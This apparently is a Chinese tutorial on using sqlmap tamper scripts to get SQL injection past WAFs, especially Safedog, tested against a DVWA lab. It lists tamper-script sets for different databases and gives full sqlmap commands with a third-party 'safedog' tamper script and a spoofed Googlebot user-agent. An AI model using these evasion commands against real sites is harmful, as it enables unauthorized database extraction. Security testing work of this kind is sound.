sqlmap自动化绕过waf,安全狗

企业通常部署入侵防御系统IPS或部署WAF来防御WEB攻击。

Sqlmap提供了大量绕过脚本,它将处理payload转化为绕过paylaod,目录在/tamper下,使用时只需加入参数—tamper(例如—tamper=between,randomcase)即可。

常规用法:

tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,

equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,

space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

如果数据库是MSSQL:

tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,

percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,

space2randomblank,unionalltounion,unmagicquotes

数据库是Mysql时:

tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,

ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,

securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

下面我们将演示如何使用这些脚本:

准备环境:Windows2008 装上DVWA /Kali Linux-sqlmap/安全狗4.0 apache版

我们将测试sql盲注

还是老方法,一套脚本下来试试:

[email protected]:~# sqlmap -r burp.log –dbs –tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords, –level=5 –risk=3 -p id –dbms=mysql –flush-session   

虽然这种方式有时候管用,但在装有安全狗的windows下依然乏力。因此需要寻找脚本,这里已经有人写好了

http://flag0.com/2018/04/20/bypass%E5%AE%89%E5%85%A8%E7%8B%97/

copy脚本,丢到tamper目录下

终端上使用命令:

[email protected]:~# sqlmap -r burp.log –dbs –tamper=safedog –level=5 –risk=3 -p id –dbms=mysql –flush-session –user-agent=”Mozilla/5.0(compatible;Googlebot/2.1;+http://www.google.com/bot.html)”

很快很流畅的跑出了数据库。

You may also like...